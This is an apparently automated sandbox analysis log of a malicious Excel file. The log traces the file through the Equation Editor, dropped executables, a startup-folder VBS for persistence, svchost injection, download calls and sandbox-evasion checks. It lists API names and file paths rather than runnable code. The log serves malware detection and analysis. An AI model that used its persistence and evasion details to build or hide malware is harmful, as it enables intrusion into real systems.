Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 202404294766578200.xlam.xlsx	Initial sample: OLE zip file path = xl/media/image1.jpg
Source: 202404294766578200.xlam.xlsx	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: 202404294766578200.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_009F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_009F42DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560102 push ds; ret	2_2_03560106
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A10A76 push ecx; ret	3_2_00A10A89
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D60A76 push ecx; ret	6_2_00D60A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00457106 push ecx; ret	7_2_00457119
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0045B11A push esp; ret	7_2_0045B141
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0045E54D push esi; ret	7_2_0045E556
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00457A28 push eax; ret	7_2_00457A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00434E56 push ecx; ret	7_2_00434E69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10002806 push ecx; ret	7_2_10002819

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

7_2_00406EB0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\CKK.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\CKK.exe	File created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe			Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

7_2_0041AA4A

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A0F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	3_2_00A0F98E
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A81C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	3_2_00A81C41
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D5F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	6_2_00D5F98E
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DD1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	6_2_00DD1C41

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

7_2_0041CB50

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CKK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0040F7A7 Sleep,ExitProcess,

7_2_0040F7A7

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Roaming\CKK.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_3-97405
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Source: C:\Windows\SysWOW64\svchost.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

7_2_0041A748

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 9275			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: foregroundWindowGot 1766			Jump to behavior

Source: C:\Users\user\AppData\Roaming\CKK.exe	API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	API coverage: 4.6 %

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1724	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 1440	Thread sleep count: 309 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 1440	Thread sleep time: -154500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2872	Thread sleep count: 126 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2872	Thread sleep time: -378000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 1924	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2872	Thread sleep count: 9275 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2872	Thread sleep time: -27825000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 544	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	3_2_00A5DBBE
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A2C2A2 FindFirstFileExW,	3_2_00A2C2A2
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A668EE FindFirstFileW,FindClose,	3_2_00A668EE
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	3_2_00A6698F
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00A5D076
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00A5D3A9
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00A69642
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00A6979D
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	3_2_00A69B2B
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A65C97 FindFirstFileW,FindNextFileW,FindClose,	3_2_00A65C97
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	6_2_00DADBBE
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D7C2A2 FindFirstFileExW,	6_2_00D7C2A2
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB68EE FindFirstFileW,FindClose,	6_2_00DB68EE
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	6_2_00DB698F
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00DAD076
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00DAD3A9
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00DB9642
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00DB979D
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	6_2_00DB9B2B
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB5C97 FindFirstFileW,FindNextFileW,FindClose,	6_2_00DB5C97
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_00409253
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	7_2_0041C291
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	7_2_0040C34D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_00409665
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044E879 FindFirstFileExA,	7_2_0044E879
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	7_2_0040880C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040783C FindFirstFileW,FindNextFileW,	7_2_0040783C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	7_2_00419AF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	7_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	7_2_0040BD37
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10006580 FindFirstFileExA,	7_2_10006580

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

7_2_00407C97

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_009F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_009F42DE

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2278
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2465
